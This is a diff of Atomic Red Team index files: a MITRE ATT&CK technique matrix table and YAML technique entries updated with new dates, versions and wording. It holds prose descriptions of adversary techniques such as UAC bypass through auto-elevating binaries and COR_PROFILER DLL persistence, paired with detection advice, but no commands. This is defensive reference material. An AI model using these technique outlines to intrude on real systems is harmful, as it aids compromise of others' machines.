[Keylogging](../../T1056.001/T1056.001.md) | | [Ingress Tool Transfer](../../T1105/T1105.md) | Reflection Amplification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | Software Deployment Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Default Accounts](../../T1078.001/T1078.001.md) | [Default Accounts](../../T1078.001/T1078.001.md) | [Keylogging](../../T1056.001/T1056.001.md) | [Security Software Discovery](../../T1518.001/T1518.001.md) | | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Internal Proxy](../../T1090.001/T1090.001.md) | Resource Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | System Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Search Order Hijacking](../../T1574.001/T1574.001.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Deobfuscate/Decode Files or Information](../../T1140/T1140.md) | LLMNR/NBT-NS Poisoning and SMB Relay [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Software Discovery](../../T1518/T1518.md) | | [Local Data Staging](../../T1074.001/T1074.001.md) | | Junk Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [DLL Side-Loading](../../T1574.002/T1574.002.md) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Direct Volume Access](../../T1006/T1006.md) | [LSA Secrets](../../T1003.004/T1003.004.md) | [System Checks](../../T1497.001/T1497.001.md) | | [Local Email Collection](../../T1114.001/T1114.001.md) | | Mail Protocols [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Visual Basic](../../T1059.005/T1059.005.md) | [Default Accounts](../../T1078.001/T1078.001.md) | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable Windows Event Logging](../../T1562.002/T1562.002.md) | [LSASS Memory](../../T1003.001/T1003.001.md) | [System Information Discovery](../../T1082/T1082.md) | | Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Service Stop](../../T1489/T1489.md) | +| | [Windows Command Shell](../../T1059.003/T1059.003.md) | [Domain Account](../../T1136.002/T1136.002.md) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Man-in-the-Middle [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multi-hop Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | [Windows Management Instrumentation](../../T1047/T1047.md) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Disable or Modify Tools](../../T1562.001/T1562.001.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Remote Data Staging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) | +| | | Event Triggered Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTDS](../../T1003.003/T1003.003.md) | [System Owner/User Discovery](../../T1033/T1033.md) | | Remote Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Application Layer Protocol](../../T1095/T1095.md) | Transmitted Data Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | +| | | Exchange Email Delegate Permissions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Network Sniffing](../../T1040/T1040.md) | [System Service Discovery](../../T1007/T1007.md) | | [Screen Capture](../../T1113/T1113.md) | | Non-Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Dynamic-link Library Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [OS Credential Dumping](../../T1003/T1003.md) | [System Time Discovery](../../T1124/T1124.md) | | Sharepoint [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Non-Standard Port](../../T1571/T1571.md) | | +| | | [External Remote Services](../../T1133/T1133.md) | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | Environmental Keying [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Cracking](../../T1110.002/T1110.002.md) | Time Based Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Video Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | One-Way Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Filter DLL](../../T1556.002/T1556.002.md) | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Hypervisor [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Execution Guardrails [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Guessing](../../T1110.001/T1110.001.md) | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Image File Execution Options Injection](../../T1546.012/T1546.012.md) | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Password Spraying](../../T1110.003/T1110.003.md) | | | | | Protocol Tunneling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Extra Window Memory Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Private Keys](../../T1552.004/T1552.004.md) | | | | | Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Local Account](../../T1136.001/T1136.001.md) | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | [File Deletion](../../T1070.004/T1070.004.md) | [Security Account Manager](../../T1003.002/T1003.002.md) | | | | | [Remote Access Software](../../T1219/T1219.md) | | +| | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Silver Ticket [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Standard Encoding [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Logon Script (Windows)](../../T1037.001/T1037.001.md) | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | Group Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Netsh Helper DLL](../../T1546.007/T1546.007.md) | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hidden File System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Network Logon Script [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Files and Directories](../../T1564.001/T1564.001.md) | Two-Factor Authentication Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Hidden Window](../../T1564.003/T1564.003.md) | Unsecured Credentials [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | Office Template Macros [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | Hide Artifacts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | +| | | [Office Test](../../T1137.002/T1137.002.md) | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Hijack Execution Flow [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Outlook Forms [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Impair Command History Logging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Outlook Home Page [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [PowerShell Profile](../../T1546.013/T1546.013.md) | Impair Defenses [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Outlook Rules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Path Interception [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Hollowing](../../T1055.012/T1055.012.md) | [Indicator Removal on Host](../../T1070/T1070.md) | | | | | | | | +| | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Process Injection](../../T1055/T1055.md) | [Indirect Command Execution](../../T1202/T1202.md) | | | | | | | | +| | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Install Root Certificate](../../T1553.004/T1553.004.md) | | | | | | | | +| | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | SID-History Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [InstallUtil](../../T1218.004/T1218.004.md) | | | | | | | | +| | | Port Monitors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Scheduled Task](../../T1053.005/T1053.005.md) | Invalid Code Signature [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [PowerShell Profile](../../T1546.013/T1546.013.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Screensaver](../../T1546.002/T1546.002.md) | [MSBuild](../../T1127.001/T1127.001.md) | | | | | | | | +| | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | Make and Impersonate Token [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | +| | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Scheduled Task](../../T1053.005/T1053.005.md) | Thread Execution Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Thread Local Storage [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | +| | | [Screensaver](../../T1546.002/T1546.002.md) | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Mshta](../../T1218.005/T1218.005.md) | | | | | | | | +| | | [Security Support Provider](../../T1547.005/T1547.005.md) | [Token Impersonation/Theft](../../T1134.001/T1134.001.md) | [Msiexec](../../T1218.007/T1218.007.md) | | | | | | | | +| | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [NTFS File Attributes](../../T1564.004/T1564.004.md) | | | | | | | | +| | | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | [Network Share Connection Removal](../../T1070.005/T1070.005.md) | | | | | | | | +| | | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Windows Service](../../T1543.003/T1543.003.md) | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | +| | | [Shortcut Modification](../../T1547.009/T1547.009.md) | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | [Odbcconf](../../T1218.008/T1218.008.md) | | | | | | | | +| | | System Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Parent PID Spoofing](../../T1134.004/T1134.004.md) | | | | | | | | +| | | Time Providers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Hash](../../T1550.002/T1550.002.md) | | | | | | | | +| | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Pass the Ticket](../../T1550.003/T1550.003.md) | | | | | | | | +| | | [Transport Agent](../../T1505.002/T1505.002.md) | | [Password Filter DLL](../../T1556.002/T1556.002.md) | | | | | | | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Web Shell](../../T1505.003/T1505.003.md) | | Path Interception by Search Order Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md) | | [Path Interception by Unquoted Path](../../T1574.009/T1574.009.md) | | | | | | | | +| | | [Windows Service](../../T1543.003/T1543.003.md) | | Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | [Winlogon Helper DLL](../../T1547.004/T1547.004.md) | | Portable Executable Injection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Process Doppelgänging [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | [Process Hollowing](../../T1055.012/T1055.012.md) | | | | | | | | | | | | | [Process Injection](../../T1055/T1055.md) | | | | | | | | @@ -108,7 +110,9 @@ | | | | | Trusted Developer Utilities Proxy Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Use Alternate Authentication Material [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | User Activity Based Checks [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | VBA Stomping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | | | Verclsid [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | | | [Windows File and Directory Permissions Modification](../../T1222.001/T1222.001.md) | | | | | | | | | | | | | [XSL Script Processing](../../T1220/T1220.md) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 883f0a0c..865ac911 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -111,7 +111,7 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-25T19:57:54.923Z' + modified: '2020-07-22T21:36:52.825Z' created: '2020-01-30T13:58:14.373Z' x_mitre_data_sources: - Windows Registry @@ -637,7 +637,7 @@ privilege-escalation: and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a - shim. However, certain shims can be used to [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002) + shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims @@ -1110,10 +1110,22 @@ privilege-escalation: atomic_tests: [] T1547: technique: + id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf + description: |- + Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. + + Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. + name: Boot or Logon Autostart Execution + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1547 url: https://attack.mitre.org/techniques/T1547 + - external_id: CAPEC-564 + source_name: capec + url: https://capec.mitre.org/data/definitions/564.html - url: http://msdn.microsoft.com/en-us/library/aa376977 description: Microsoft. (n.d.). Run and RunOnce Registry Keys. Retrieved November 12, 2014. @@ -1137,29 +1149,18 @@ privilege-escalation: description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016. source_name: TechNet Autoruns - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Boot or Logon Autostart Execution - description: |- - Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance Reg Persistence Sept 2013)(Citation: Linux Kernel Programming)  These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configuration information, such as the Windows Registry. An adversary may achieve the same goal by modifying or extending features of the kernel. - - Since some boot or logon autostart programs run with higher privileges, an adversary may leverage these to elevate privileges. - id: attack-pattern--1ecb2399-e8ba-4f6b-8ba7-5c27d49405cf type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-06-30T21:23:15.683Z' + modified: '2020-10-09T16:05:36.772Z' created: '2020-01-23T17:46:59.535Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false - x_mitre_permissions_required: - - User - - Administrator - - root + x_mitre_platforms: + - Linux + - macOS + - Windows x_mitre_detection: "Monitor for additions or modifications of mechanisms that could be used to trigger autostart execution, such as relevant additions to the Registry. Look for changes that are not correlated with known updates, @@ -1178,10 +1179,12 @@ privilege-escalation: Look for abnormal process behavior that may be due to a process loading a malicious DLL.\n\nMonitor for abnormal usage of utilities and command-line parameters involved in kernel modification or driver installation." - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_permissions_required: + - User + - Administrator + - root + x_mitre_is_subtechnique: false + x_mitre_version: '1.1' atomic_tests: [] T1037: technique: @@ -1213,12 +1216,13 @@ privilege-escalation: phase_name: persistence - kill_chain_name: mitre-attack phase_name: privilege-escalation - modified: '2020-03-27T16:49:15.953Z' + modified: '2020-08-03T16:47:37.240Z' created: '2017-05-31T21:30:38.910Z' x_mitre_is_subtechnique: false x_mitre_platforms: - macOS - Windows + - Linux x_mitre_detection: Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions @@ -1227,7 +1231,7 @@ privilege-escalation: x_mitre_data_sources: - File monitoring - Process monitoring - x_mitre_version: '2.0' + x_mitre_version: '2.1' atomic_tests: [] T1548.002: technique: @@ -1242,7 +1246,7 @@ privilege-escalation: * eventvwr.exe can auto-elevate and execute a specified binary or script.(Citation: enigma0x3 Fileless UAC Bypass)(Citation: Fortinet Fareit) Another bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.(Citation: SANS UAC Bypass) - name: Bypass User Access Control + name: Bypass User Account Control created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 object_marking_refs: - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 @@ -1295,7 +1299,7 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: defense-evasion - modified: '2020-06-25T19:57:54.510Z' + modified: '2020-07-22T21:36:52.458Z' created: '2020-01-30T14:24:34.977Z' x_mitre_platforms: - Windows @@ -1322,7 +1326,7 @@ privilege-escalation: x_mitre_effective_permissions: - Administrator x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_version: '2.0' x_mitre_defense_bypassed: - Windows User Account Control identifier: T1548.002 @@ -1546,7 +1550,7 @@ privilege-escalation: The COR_PROFILER environment variable can be set at various scopes (system, user, or process) resulting in different levels of influence. System and user-wide environment variable scopes are specified in the Registry, where a [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as a profiler DLL. A process scope COR_PROFILER can also be created in-memory without modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need to be registered as long as the location of the DLL is specified in the COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013) - Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Access Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) + Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious DLL in the context of all .NET processes every time the CLR is invoked. The COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process executes at a higher permission level, as well as to hook and [Impair Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa Invisi-Shell)(Citation: subTee .NET Profilers May 2017) id: attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335 type: attack-pattern kill_chain_phases: @@ -1815,6 +1819,15 @@ privilege-escalation: name: command_prompt T1078.004: technique: + id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 + description: |- + Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) + + Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. + name: Cloud Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1078.004 @@ -1831,15 +1844,6 @@ privilege-escalation: url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs description: Microsoft. (n.d.). Deploying Active Directory Federation Services in Azure. Retrieved March 13, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Cloud Accounts - description: |- - Adversaries may obtain and abuse credentials of a cloud account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. In some cases, cloud accounts may be federated with traditional identity management system, such as Window Active Directory.(Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation) - - Compromised credentials for cloud accounts can be used to harvest sensitive data from online storage accounts and databases. Access to cloud accounts can also be abused to gain Initial Access to a network by abusing a [Trusted Relationship](https://attack.mitre.org/techniques/T1199). Similar to [Domain Accounts](https://attack.mitre.org/techniques/T1078/002), compromise of federated cloud accounts may allow adversaries to more easily move laterally within an environment. - id: attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65 type: attack-pattern kill_chain_phases: - kill_chain_name: mitre-attack @@ -1850,21 +1854,8 @@ privilege-escalation: phase_name: privilege-escalation - kill_chain_name: mitre-attack phase_name: initial-access - modified: '2020-03-23T21:59:36.729Z' + modified: '2020-10-19T16:01:22.090Z' created: '2020-03-13T20:36:57.378Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: Perform regular audits of cloud accounts to detect abnormal - or malicious activity, such as accessing information outside of the normal - function of the account or account usage at atypical hours. - x_mitre_data_sources: - - Azure activity logs - - Authentication logs - - AWS CloudTrail logs - - Stackdriver logs x_mitre_platforms: - AWS - GCP @@ -1872,6 +1863,19 @@ privilege-escalation: - SaaS - Azure AD - Office 365 + x_mitre_data_sources: + - Azure activity logs + - Authentication logs + - AWS CloudTrail logs + - Stackdriver logs + x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal + or malicious behavior, such as accessing information outside of the normal + function of the account or account usage at atypical hours. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_is_subtechnique: true + x_mitre_version: '1.1' atomic_tests: [] T1546.015: technique: @@ -2000,34 +2004,6 @@ privilege-escalation: atomic_tests: [] T1543: technique: - created: '2020-01-10T16:03:18.865Z' - modified: '2020-03-25T22:32:16.537Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - id: attack-pattern--106c0cf6-bf73-4601-9aa8-0945c2715ec5 - description: "Adversaries may create or modify system-level processes to repeatedly - execute malicious payloads as part of persistence. 